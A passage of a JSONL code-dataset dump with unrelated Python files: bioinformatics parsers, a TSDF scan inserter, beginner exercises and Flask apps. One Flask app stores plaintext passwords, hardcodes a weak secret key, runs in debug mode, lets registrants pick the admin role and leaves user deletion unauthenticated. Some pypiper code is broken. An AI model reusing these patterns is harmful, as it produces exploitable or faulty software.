window_width, motif_file\n )\n cmd += \" awk -v OFS='\\t' '{print $2, $3, $4, $1, $6, $5}' |\"\n cmd += \"\"\" awk -v OFS='\\t' -F '\\t' '{ gsub(\"0\", \"+\", $6) ; gsub(\"1\", \"-\", $6) ; print }' |\"\"\"\n cmd += \" fix_bedfile_genome_boundaries.py {0} | sortBed > {1}\".format(\n genome, output_bed\n )\n return cmd\n\n def get_read_type(self, bam_file, n=10):\n \"\"\"\n Gets the read type (single, paired) and length of bam file.\n :param str bam_file: Bam file to determine read attributes.\n :param int n: Number of lines to read from bam file.\n :return str, int: tuple of read type and read length\n \"\"\"\n\n from collections.abc import Counter\n\n try:\n p = subprocess.Popen(\n [self.tools.samtools, \"view\", bam_file], stdout=subprocess.PIPE\n )\n # Count paired alignments\n paired = 0\n read_length = Counter()\n while n > 0:\n line = p.stdout.next().split(\"\\t\")\n flag = int(line[1])\n read_length[len(line[9])] += 1\n if 1 & flag: # check decimal flag contains 1 (paired)\n paired += 1\n n -= 1\n p.kill()\n except IOError(\"Cannot read provided bam file.\") as e:\n raise e\n # Get most abundant read read_length\n read_length = sorted(read_length)[-1]\n # If at least half is paired, return True\n if paired > (n / 2.0):\n return \"PE\", read_length\n else:\n return \"SE\", read_length\n\n def parse_bowtie_stats(self, stats_file):\n \"\"\"\n Parses Bowtie2 stats file, returns series with values.\n :param str stats_file: Bowtie2 output file with alignment statistics.\n \"\"\"\n import pandas as pd\n\n stats = pd.Series(\n index=[\n \"readCount\",\n \"unpaired\",\n \"unaligned\",\n \"unique\",\n \"multiple\",\n \"alignmentRate\",\n ]\n )\n try:\n with open(stats_file) as handle:\n content = handle.readlines() # list of strings per line\n except:\n return stats\n # total reads\n try:\n line = [\n i for i in range(len(content)) if \" reads; of these:\" in content[i]\n ][0]\n stats[\"readCount\"] = re.sub(\"\\D.*\", \"\", content[line])\n if 7 > len(content) > 2:\n line = [\n i\n for i in range(len(content))\n if \"were unpaired; of these:\" in content[i]\n ][0]\n stats[\"unpaired\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n else:\n line = [\n i\n for i in range(len(content))\n if \"were paired; of these:\" in content[i]\n ][0]\n stats[\"unpaired\"] = stats[\"readCount\"] - int(\n re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n )\n line = [i for i in range(len(content)) if \"aligned 0 times\" in content[i]][\n 0\n ]\n stats[\"unaligned\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [\n i for i in range(len(content)) if \"aligned exactly 1 time\" in content[i]\n ][0]\n stats[\"unique\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [i for i in range(len(content)) if \"aligned >1 times\" in content[i]][\n 0\n ]\n stats[\"multiple\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [\n i for i in range(len(content)) if \"overall alignment rate\" in content[i]\n ][0]\n stats[\"alignmentRate\"] = re.sub(\"\\%.*\", \"\", content[line]).strip()\n except IndexError:\n pass\n return stats\n\n def parse_duplicate_stats(self, stats_file):\n \"\"\"\n Parses sambamba markdup output, returns series with values.\n\n :param str stats_file: sambamba output file with duplicate statistics.\n \"\"\"\n import pandas as pd\n\n series = pd.Series()\n try:\n with open(stats_file) as handle:\n content = handle.readlines() # list of strings per line\n except:\n return series\n try:\n line = [\n i\n for i in range(len(content))\n if \"single ends (among them \" in content[i]\n ][0]\n series[\"single-ends\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [\n i\n for i in range(len(content))\n if \" end pairs... done in \" in content[i]\n ][0]\n series[\"paired-ends\"] = re.sub(\n \"\\D\", \"\", re.sub(\"\\.\\.\\..*\", \"\", content[line])\n )\n line = [\n i\n for i in range(len(content))\n if \" duplicates, sorting the list... done in \" in content[i]\n ][0]\n series[\"duplicates\"] = re.sub(\n \"\\D\", \"\", re.sub(\"\\.\\.\\..*\", \"\", content[line])\n )\n except IndexError:\n pass\n return series\n\n def parse_qc(self, qc_file):\n \"\"\"\n Parse phantompeakqualtools (spp) QC table and return quality metrics.\n\n :param str qc_file: Path to phantompeakqualtools output file, which\n contains sample quality measurements.\n \"\"\"\n import pandas as pd\n\n series = pd.Series()\n try:\n with open(qc_file) as handle:\n line = (\n handle.readlines()[0].strip().split(\"\\t\")\n ) # list of strings per line\n series[\"NSC\"] = line[-3]\n series[\"RSC\"] = line[-2]\n series[\"qualityTag\"] = line[-1]\n except:\n pass\n return series\n\n def get_peak_number(self, sample):\n \"\"\"\n Counts number of peaks from a sample's peak file.\n\n :param pipelines.Sample sample: Sample object with \"peaks\" attribute.\n \"\"\"\n proc = subprocess.Popen([\"wc\", \"-l\", sample.peaks], stdout=subprocess.PIPE)\n out, err = proc.communicate()\n sample[\"peakNumber\"] = re.sub(\"\\D.*\", \"\", out)\n return sample\n\n def get_frip(self, sample):\n \"\"\"\n Calculates the fraction of reads in peaks for a given sample.\n\n :param pipelines.Sample sample: Sample object with \"peaks\" attribute.\n \"\"\"\n import pandas as pd\n\n with open(sample.frip, \"r\") as handle:\n content = handle.readlines()\n reads_in_peaks = int(re.sub(\"\\D\", \"\", content[0]))\n mapped_reads = sample[\"readCount\"] - sample[\"unaligned\"]\n return pd.Series(reads_in_peaks / mapped_reads, index=\"FRiP\")\n","repo_name":"databio/pypiper","sub_path":"pypiper/ngstk.py","file_name":"ngstk.py","file_ext":"py","file_size_in_byte":82806,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"61"} +{"seq_id":"30639480944","text":"from flask import Blueprint\nfrom flask_restful import Api\n\nfrom eproc.resources.vendor.vendor import (\n VendorDetailResource,\n VendorResource\n)\n\nvendor_blueprint = Blueprint(\"vendor_blueprint\", __name__, url_prefix=\"/vendor\")\n\nvendor_api = Api(vendor_blueprint)\n\nvendor_api.add_resource(VendorResource, \"\")\nvendor_api.add_resource(VendorDetailResource, \"/details\")\n","repo_name":"keyinvoker/svc-procurement","sub_path":"eproc/blueprints/vendor.py","file_name":"vendor.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40921653554","text":"#!/usr/bin/python\n#\n# Practice Python Exercise #5\n# https://www.practicepython.org/exercise/2014/03/05/05-list-overlap.html\n# New Edit, for the sake of GIT / edit 1\n# Take two lists, say for example these two:\na = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nb = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\nc = []\n\n# and write a program that returns a list that contains only the elements that are \n# common between the lists (without duplicates). Make sure your program works on two\n# lists of different sizes.\n# Extras:\n# ** Randomly generate two lists to test this\n# ** Write this in one line of Python\nprint (\"Welcome to exercise 5: List Overlaps.\")\nprint (\"First iteration is with predefined lists called 'a' and 'b':\")\nif len(a) >= len(b):\n for i in range(len(b)):\n if b[i] in a:\n if b[i] not in c: # Have to make sure we aren't duplicating a number that is already in our c list.\n c.append(b[i])\nelse:\n for i in range(len(a)):\n if a[i] in b:\n if a[i] not in c: # Have to make sure we aren't duplicating a number that is already in our c list.\n c.append(a[i])\n\n# print(set(c)) # Probably cheaty to use a set to print only the unique values\nprint (\"List A:\",a)\nprint (\"List B:\",b)\nprint (\"Overlaps:\",c)\n\n# Generate two lists of a random length, with random numbers in it\n# and print a list that has the overlaps between the two lists.\n\n#Create 3 empty lists\nx = []\ny = []\nz = []\n\nimport random # Needed for random numbers\n\ndef gen_r_list(stop, start=0): # Function to generate a list of varying sizes, composed of random numbers 0-10. \n iter=start\n while iter <= stop:\n yield random.randint(0,10)\n iter += 1\n\nsize1 = random.randint(5,15) # Get a random size for the first list x[]\nsize2 = random.randint(5,15) # Get a random size for the second list y[]\nwhile size2 == size1: # Make sure the second list, y[], is not equal in size to x[]\n size2 = random.randint(5,15)\n print (size1, size2)\n\nx = list(gen_r_list(size1))\ny = list(gen_r_list(size2))\n\n# Now that we've created both lists, lets create a list of overlapping values\n\nif len(x) >= len(y):\n for i in range(len(y)):\n if y[i] in x:\n if y[i] not in z: # Have to make sure we aren't duplicating a number that is already in our z list.\n z.append(y[i])\nelse:\n for i in range(len(x)):\n if x[i] in y:\n if x[i] not in z: # Have to make sure we aren't duplicating a number that is already in our z list.\n z.append(x[i])\n\nprint(\"Challenge #2: Randomly generate two lists to test non-duplicated overlaps between lists\")\nprint (\"List X: \",x,\"size:\",int(size1))\nprint (\"List Y: \",y,\"size:\",int(size2))\nprint (\"Overlaps: \",sorted(z)) # If you want to use z.sort() here you have to do z.sort() on a given line by itself, and then print it. You can't do print(z.sort()). (Why?)\n","repo_name":"dpalmero1971/python_exercises","sub_path":"ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6295263267","text":"from flask import Flask, render_template, flash, url_for, logging, request, redirect, session, jsonify, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import desc\nimport json\nfrom datetime import datetime\nfrom functools import wraps\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///school.db'\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\ndb = SQLAlchemy(app)\n\n\nclass Users(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(50), nullable=False)\n email = db.Column(db.String(50), nullable=False)\n password = db.Column(db.String(50), nullable=False)\n role = db.Column(db.String(20), nullable=False)\n # created_date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __repr__(self):\n return '{\"id\":\"'+str(self.id) + '\", \"username\":\"' + str(self.username) + '\", \"email\":\"'+str(self.email)+'\",'+ '\"role\":\"'+str(self.role)+'\"}'\n\n\n# Check if is admin\ndef is_admin(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if session['role'] == 'admin':\n return f(*args, **kwargs)\n else:\n return redirect(url_for('login'))\n return wrap\n\n# Check if user logged in\n\n\ndef is_logged_in(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n return redirect(url_for('login'))\n return wrap\n\n\n@app.route('/')\ndef index():\n\n return render_template('index.html')\n\n\n@app.route('/admin')\n@is_logged_in\n@is_admin\ndef admin():\n all_users = Users.query.order_by(desc(Users.id)).all()\n return render_template('admin.html', users=all_users)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\n if request.method == 'POST':\n email = request.form['email']\n password = request.form['password']\n user = Users.query.filter_by(\n password=password,\n email=email\n ).first()\n if user:\n session['logged_in'] = True\n session['username'] = user.username\n session['role'] = user.role\n session['user_id'] = user.id\n if session['role'] == 'admin':\n return redirect(url_for('admin'))\n else:\n return render_template('dashboard.html', user=user)\n\n else:\n msg = 'Invalid Login'\n return render_template('login.html', msg=msg)\n else:\n return render_template('login.html')\n\n\n@app.route('/register', methods=['POST', 'GET'])\n@app.route('/add-person', methods=['POST', 'GET'])\ndef register():\n\n if request.method == 'POST':\n username = request.form['username']\n email = request.form['email']\n password = request.form['password']\n role = request.form['role']\n new_user = Users(\n username=username,\n email=email,\n password=password,\n role=role\n )\n db.session.add(new_user)\n db.session.commit()\n if request.form['redirect'] == 'admin':\n return redirect(url_for('admin'))\n else:\n return redirect('/login')\n else:\n return render_template('register.html')\n\n\n@app.route('/user/delete/')\ndef delete_user(id):\n user = Users.query.get_or_404(id)\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for('admin'))\n\n\n@app.route('/user/get/')\ndef get_user(id):\n user = Users.query.get_or_404(id)\n return user\n\n\n@app.route('/search', methods=['GET', 'POST'])\ndef search():\n\n results = []\n if request.method == 'POST':\n search = request.form['search']\n if search != '':\n results = Users.query.filter(Users.username.like(search)).all()\n else:\n results = Users.query.order_by(desc(Users.id)).all()\n\n return render_template('admin.html', users=results)\n\n\n@app.route('/profile/update/', methods=['GET', 'POST'])\ndef profile_edit(id):\n\n user = Users.query.get_or_404(id)\n\n if request.method == 'POST':\n user.username = request.form['username']\n user.email = request.form['email']\n user.password = request.form['password']\n db.session.commit()\n\n return redirect(url_for('dashboard'))\n\n\n@app.route('/dashboard')\n@is_logged_in\ndef dashboard():\n user_id = session['user_id']\n user = Users.query.get_or_404(user_id)\n return render_template('dashboard.html', user=user)\n\n# Logout\n@app.route('/logout')\n@is_logged_in\ndef logout():\n session.clear()\n flash('You are now logged out', 'success')\n return redirect(url_for('login'))\n\n\nif __name__ == \"__main__\":\n app.secret_key = 'secret123'\n app.run(debug=True)\n","repo_name":"qadeesz/python-flask-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16817921873","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport math as math\nfrom matplotlib import pyplot\nfrom matplotlib import cm\nfrom shapely.geometry import LineString\n\nimport tsdf\n\ndef circular_weighted_average(angles, weights):\n summed_weight = 0\n summed_y = 0\n summed_x =0\n for i in range(len(angles)):\n summed_y += np.sin(angles[i]) * weights[i]\n summed_x += np.cos(angles[i]) * weights[i]\n return math.atan2(summed_y,summed_x)\n \n \n\ndef getRaytracingHelperVariables(observation_origin, observation_ray,t_start, t_end, grid_size_inv):\n traversal_start = observation_origin + t_start * observation_ray\n traversal_end = observation_origin + t_end * observation_ray\n traversal_start_scaled = traversal_start * grid_size_inv\n traversal_end_scaled = traversal_end * grid_size_inv\n traversal_ray_scaled = traversal_end_scaled - traversal_start_scaled\n traversal_ray_scaled_inv =(1. / traversal_ray_scaled[0], 1. / traversal_ray_scaled[1])\n grid_index = np.round(traversal_start_scaled)\n grid_step = np.sign(traversal_ray_scaled)\n t_max = (grid_index - traversal_start_scaled) * traversal_ray_scaled_inv\n t_delta = grid_step * traversal_ray_scaled_inv\n return grid_index, grid_step, t_max, t_delta\n\ndef unit_vector(vector):\n return vector / np.linalg.norm(vector)\n\ndef toTwoPi(value):\n if(value > math.pi):\n return toTwoPi(value - 2 * math.pi) #value % math.pi\n if(value < - math.pi):\n return toTwoPi(value + 2 * math.pi) #value % -math.pi\n return value\n\ndef angle_between(v1, v2):\n v1_normalized = unit_vector(v1)\n v2_normalized = unit_vector(v2)\n return toTwoPi(angle(v1)-angle(v2))\n\ndef angle(v):\n v_normalized = unit_vector(v)\n return math.atan2(v_normalized[1], v_normalized[0]) \n \ndef distanceLinePoint(line_p0, line_p1, point):\n numerator = np.abs((line_p1[1]-line_p0[1])*point[0] - (line_p1[0]-line_p0[0])*point[1] + line_p1[0]*line_p0[1] - line_p1[1]*line_p0[0]) \n denominator = np.linalg.norm(line_p1-line_p0)\n return numerator/denominator \n\ndef gaussian(x, mu=0, sigma=1):\n return 1/(math.sqrt(2*math.pi)*sigma**2)*math.e**(-0.5*((x-mu)/sigma**2)**2)\n\nclass ScanNormalTSDFRangeInserter: \n \n def __init__(self, use_normals_weight=False, n_normal_samples=8, default_weight=1, use_distance_cell_to_observation_weight=False, use_distance_cell_to_ray_weight=False, use_scale_distance=False, normal_distance_factor=1, max_weight=1000, draw_normals_scan_indices=[0], use_distance_cell_to_hit = False):\n self.use_normals_weight = use_normals_weight\n self.use_distance_cell_to_observation_weight = use_distance_cell_to_observation_weight\n self.sigma_distance_cell_to_observation_weight = 1.0\n self.use_distance_cell_to_ray_weight = use_distance_cell_to_ray_weight\n self.sigma_distance_cell_to_ray_weight = 0.6\n self.n_normal_samples = n_normal_samples\n self.default_weight = default_weight\n self.normal_distance_factor = normal_distance_factor #0 --> all normals same weight, 1 --> f(0)=1, f(0.1)=0.9 f(0.2)=0.82 independent of distance, inf -->only closest normal counts\n self.max_weight = max_weight\n self.draw_normals_scan_indices = draw_normals_scan_indices\n self.num_inserted_scans = 0\n self.use_scale_distance = use_scale_distance\n self.use_distance_cell_to_hit = use_distance_cell_to_hit\n print(self)\n \n def __str__(self):\n return \"ScanNormalTSDFRangeInserter \\n use_normals_weight %s \\n n_normal_samples %s\\n default_weight %s\\n normal_distance_factor %s\\n\" % (self.use_normals_weight, self.n_normal_samples, self.default_weight, self.normal_distance_factor)\n \n \n def updateCell(self, tsdf, cell_index, update_distance, ray_length, update_weight): \n if(abs(update_distance)< tsdf.truncation_distance):\n updated_weight = min(tsdf.getWeight(cell_index) + update_weight, self.max_weight)\n updated_tsdf = (tsdf.getTSDF(cell_index) * tsdf.getWeight(cell_index) + update_distance * update_weight) / (update_weight + tsdf.getWeight(cell_index)) \n tsdf.setWeight(cell_index, updated_weight)\n tsdf.setTSDF(cell_index, updated_tsdf)\n #tsdf.setWeight(cell_index, 0.5)\n #tsdf.setTSDF(cell_index, 0.5) \n\n \n def computeNormal(self, sample, neighbors, sample_origin):\n normals = []\n normal_distances = []\n normal_weights = []\n for neighbor in neighbors:\n sample_to_neighbor = sample - neighbor\n origin_to_neighbor = sample_origin - neighbor\n origin_to_sample = sample_origin - sample\n sample_to_neighbor_rotated = np.array([-sample_to_neighbor[1],sample_to_neighbor[0]])\n if(sample_to_neighbor_rotated.dot(origin_to_sample) > 0):\n sample_to_neighbor = -sample_to_neighbor\n \n tangent_angle = angle(sample_to_neighbor)\n normal_angle = toTwoPi(tangent_angle - math.pi/2)\n normals += [normal_angle]\n normal_distance = np.linalg.norm(sample-neighbor)\n normal_distances += [normal_distance]\n normal_weights += [math.e**(-self.normal_distance_factor * normal_distance)]\n \n normals = np.array(normals)\n normal_weights = np.array(normal_weights)\n normal_mean = circular_weighted_average(normals, normal_weights)\n delta = normals-normal_mean\n delta_flipped = (normals-normal_mean)-2*math.pi\n is_min_delta = np.abs(delta) < np.abs(delta_flipped)\n min_deltas = delta*is_min_delta + delta_flipped*(1-is_min_delta)\n normal_var = np.average((min_deltas-normal_mean)**2, weights=normal_weights)\n normal_weight_sum = np.sum(normal_weights)\n return normal_mean, normal_var, normal_weight_sum\n \n def drawScanWithNormals(self, hits, normal_orientations, sensor_origin, normal_weights, normal_variances, normal_angle_to_ray):\n fig = plt.figure()\n ax = plt.subplot(311)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n sc = ax.scatter(x_val, y_val, c=normal_weights, marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal') \n plt.title('Normal Estimation Weights')\n ''' \n ax = plt.subplot(412)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n sc = ax.scatter(x_val, y_val, c=normal_variances, marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal')\n plt.title('Normal Estimation Variances')\n ''' \n ax = plt.subplot(312)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n sc = ax.scatter(x_val, y_val, c=np.cos(normal_angle_to_ray), marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal')\n plt.title('Angle normal to ray')\n \n ax = plt.subplot(313)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n combined_weights = np.reciprocal(np.sqrt(np.array(normal_variances))) * (np.square(np.array(normal_weights))) * np.square(np.cos(normal_angle_to_ray))\n combined_weights = np.cos(normal_angle_to_ray)\n sc = ax.scatter(x_val, y_val, c=combined_weights, marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal')\n plt.title('Combined weight')\n \n \n def insertScan(self, tsdf, hits, origin):\n origin = np.array(origin)\n hits = np.array(hits)\n n_hits = len(hits)\n normal_orientations = []\n normal_orientation_variances = []\n normal_estimation_weight_sums = []\n normal_estimation_angles_to_ray = []\n normal_estimation_angle_to_ray = 0\n normal_orientation = 0\n for idx, hit in enumerate(hits): \n #print('origin',origin) \n #print('hit',hit) \n hit = np.array(hit)\n ray = hit - origin \n \n if self.use_normals_weight or True:\n neighbor_indices = np.array(list(range(idx-int(np.floor(self.n_normal_samples/2)), idx)) + list(range(idx+1, idx+int(np.ceil(self.n_normal_samples/2) + 1))))\n neighbor_indices = neighbor_indices[neighbor_indices >= 0]\n neighbor_indices = neighbor_indices[neighbor_indices < n_hits]\n normal_orientation, normal_var, normal_estimation_weight_sum = self.computeNormal(hit, hits[neighbor_indices], origin)\n normal_orientations += [normal_orientation]\n normal_estimation_weight_sums += [normal_estimation_weight_sum]\n normal_orientation_variances += [normal_var]\n normal_estimation_angle_to_ray = normal_orientation - angle(-ray)\n normal_estimation_angles_to_ray += [normal_estimation_angle_to_ray] # \n \n ray_range = np.linalg.norm(ray) \n range_inv = 1.0 / ray_range\n t_truncation_distance = tsdf.truncation_distance * range_inv\n t_start = 1.0 - t_truncation_distance\n t_end = 1.0 + t_truncation_distance\n grid_index, grid_step, t_max, t_delta = getRaytracingHelperVariables(origin, ray, t_start,t_end, 1. / tsdf.resolution)\n t = 0\n while t < 1.0 : \n #print('t',t,'t_max',t_max,'t_delta',t_delta) \n #print('grid_index',grid_index)\n t_next = np.min(t_max)\n min_coeff_idx = np.argmin(t_max)\n sampling_point = grid_index * tsdf.resolution #origin + (t + t_next)/2 * ray\n #print('sampling_point',sampling_point,'t',origin + (t) * ray,'tn',origin + (t_next) * ray)\n cell_index = tsdf.getCellIndexAtPosition(sampling_point)\n cell_center = tsdf.getPositionAtCellIndex(cell_index)\n distance_cell_center_to_origin = np.linalg.norm(cell_center - origin)\n distance_cell_center_to_hit = np.linalg.norm(cell_center - hit)\n update_weight = 1\n update_distance = ray_range - distance_cell_center_to_origin\n #use_distance_cell_to_observation_weight\n if self.use_normals_weight:\n update_weight = np.cos(normal_estimation_angle_to_ray)\n if(update_weight < 0):\n print('WARNING update_weight=',update_weight)\n if self.use_distance_cell_to_observation_weight:\n normalized_distance_cell_to_observation = np.abs(ray_range - distance_cell_center_to_origin)/tsdf.resolution\n distance_cell_to_observation_weight = gaussian(normalized_distance_cell_to_observation, 0, self.sigma_distance_cell_to_observation_weight) \n ''' \n distance_cell_to_observation_weight = np.abs((tsdf.truncation_distance - np.abs(ray_range - distance_cell_center_to_origin))/tsdf.truncation_distance)\n '''\n update_weight *= distance_cell_to_observation_weight\n if distance_cell_to_observation_weight < 0:\n print('WARNING distance_cell_to_observation_weight=',distance_cell_to_observation_weight)\n if self.use_distance_cell_to_ray_weight:\n distance_cell_to_ray = distanceLinePoint(origin, hit, cell_center)/tsdf.resolution\n #distance_cell_to_ray_weight = distance_cell_to_ray\n distance_cell_to_ray_weight = gaussian(distance_cell_to_ray, 0, self.sigma_distance_cell_to_ray_weight) \n update_weight *= distance_cell_to_ray_weight\n if distance_cell_to_ray_weight < 0:\n print('WARNING distance_cell_to_ray_weight=',distance_cell_to_ray_weight)\n \n if self.use_scale_distance:\n #print(np.array([np.cos(normal_orientation), np.sin(normal_orientation)]))\n update_distance = (cell_center - hit).dot(np.array([np.cos(normal_orientation), np.sin(normal_orientation)]))\n if self.use_distance_cell_to_hit:\n update_distance = distance_cell_center_to_hit\n if self.use_distance_cell_to_hit and self.use_scale_distance:\n print('CONFIGURATION ERROR')\n \n \n self.updateCell(tsdf, cell_index, update_distance , ray_range, update_weight)\n #print('cell_index', cell_index) \n t = t_next\n grid_index[min_coeff_idx] += grid_step[min_coeff_idx]\n t_max[min_coeff_idx] += t_delta[min_coeff_idx]\n if self.use_normals_weight:\n if self.num_inserted_scans in self.draw_normals_scan_indices :\n self.drawScanWithNormals(hits, normal_orientations, origin, normal_estimation_weight_sums, normal_orientation_variances, normal_estimation_angles_to_ray)\n self.draw_normals = False\n #print('avg normal error', np.mean(np.abs(normal_orientations)))\n pass\n self.num_inserted_scans += 1\n","repo_name":"kdaun/ray_simulator","sub_path":"tsdf_inserter.py","file_name":"tsdf_inserter.py","file_ext":"py","file_size_in_byte":14871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18901291967","text":"# 生成器函数\ndef my_range(end):\n number = -1\n while number < end - 1:\n number += 1\n yield number\n\n\n# for item in my_range(5):\n# print(item)\n\n# 生成器 = 可迭代对象 + 迭代器\n\n\nlist01 = [5, 1, 7, 5, 4, 6, 10]\n\n\ndef get_num(list_target):\n list_res = []\n for item in list_target:\n if not item % 2:\n list_res.append(item)\n return list_res # 一去不复返, 如果返回多个结果必须先整体存起来再返回\n\n\ndef get_res(list_target): # 调函数不执行, 返回生成器对象 = 可迭代对象 + 迭代器\n for item in list_target:\n if not item % 2:\n yield item # 暂时离开\n\n\nprint(get_num(list01))\n\n# def get_res(list_target):\n# index = 0\n# while index < len(list_target):\n# if not list01[index] % 2:\n# yield list_target[index]\n# index += 1\n#\n#\n# for i in get_res(list01):\n# print(i)\n","repo_name":"QiWang-SJTU/AID1906","sub_path":"Part1 Python base/03Python_core/03Exercise_code/Day16/exercise09.py","file_name":"exercise09.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"691514515","text":"from offregister_fab_utils.apt import apt_depends\nfrom offregister_fab_utils.fs import cmd_avail\nfrom offregister_fab_utils.git import clone_or_update\n\n\ndef install_plugin(c, repo_team, repo_name, location=None):\n \"\"\"\n :param c: Connection\n :type c: ```fabric.connection.Connection```\n \"\"\"\n\n apt_depends(c, \"git\")\n cmd = \"dokku\"\n if not cmd_avail(c, cmd):\n raise EnvironmentError(\n \"Install {cmd} before installing plugins\".format(cmd=cmd)\n )\n with c.cd(\"/var/lib/dokku/plugins\"):\n clone_or_update(c, team=repo_team, repo=repo_name, to_dir=location or repo_name)\n c.run(\"dokku plugins-install\")\n","repo_name":"offscale/offregister","sub_path":"offregister/aux_recipes/dokku_plugin.py","file_name":"dokku_plugin.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11684215589","text":"# mldesigner package contains the command_component which can be used to define component from a python function\nimport logging\nfrom pathlib import Path\n\nfrom mldesigner import command_component, Input, Output\n\nURI_FOLDER = \"uri_folder\"\n\n\n@command_component(\n display_name=\"Evaluate\",\n environment=\"./environment.conda.yaml\",\n)\ndef evaluate_step(\n model_input: Input(type=URI_FOLDER),\n images_input: Input(type=URI_FOLDER),\n model_output: Output(type=URI_FOLDER),\n integration_output: Output(type=URI_FOLDER),\n):\n from evaluate import evaluate\n\n evaluate(logging, Path(model_input), Path(images_input),\n Path(model_output), Path(integration_output))\n\n\n","repo_name":"guillaume-thomas/MLOpsPython-2022-2023","sub_path":"train/evaluate/azureml_step.py","file_name":"azureml_step.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"8551947307","text":"def answer(question):\n parts = question.split()\n expression = []\n operations = {\n 'plus': '+', 'minus': '-', 'multiplied': '*', 'divided': '/'\n }\n for part in parts:\n if part.isdecimal():\n expression.append(part)\n elif part[-1] == '?':\n try:\n expression.append(str(int(part[:-1])))\n except ValueError:\n if part[:-1] not in operations.keys():\n if len(expression) == 0 and question == 'What is?':\n raise ValueError(\"syntax error\")\n raise ValueError(\"unknown operation\")\n else:\n expression.append(part[:-1])\n elif part in operations.keys():\n expression.append(part)\n elif part[0] == '-':\n expression.append(part)\n\n if len(expression) == 1:\n if expression[0] not in operations.keys():\n return int(expression[0])\n else:\n raise ValueError(\"syntax error\")\n\n valid_mask = [part not in operations.keys() for part in expression]\n\n if not valid_mask[0] or not valid_mask[-1]:\n raise ValueError(\"syntax error\")\n\n if len(valid_mask) % 2 == 0:\n if expression[-2] == 'multiplied':\n raise ValueError(\"unknown operation\")\n if not valid_mask[1] and not valid_mask[2]:\n raise ValueError(\"syntax error\")\n if valid_mask[-2] and valid_mask[-1]:\n raise ValueError(\"syntax error\")\n raise ValueError(\"unknown operation\")\n\n if valid_mask[1]:\n raise ValueError(\"syntax error\")\n\n result = 0\n op = ''\n for part in expression:\n if part in operations.keys():\n op = part\n else:\n if op:\n result = int(eval(f'{result}{operations[op]}{part}'))\n op = ''\n else:\n result += int(part)\n return result\n\n\nif __name__ == '__main__':\n print(answer(\"What is 7 plus multiplied by -2?\"))\n #print(answer(\"What is 1 plus 2 1?\"))\n #print(answer(\"What is 7 plus multiplied by -2?\"))\n #print(answer('What is 52?'))\n #print(answer('What is 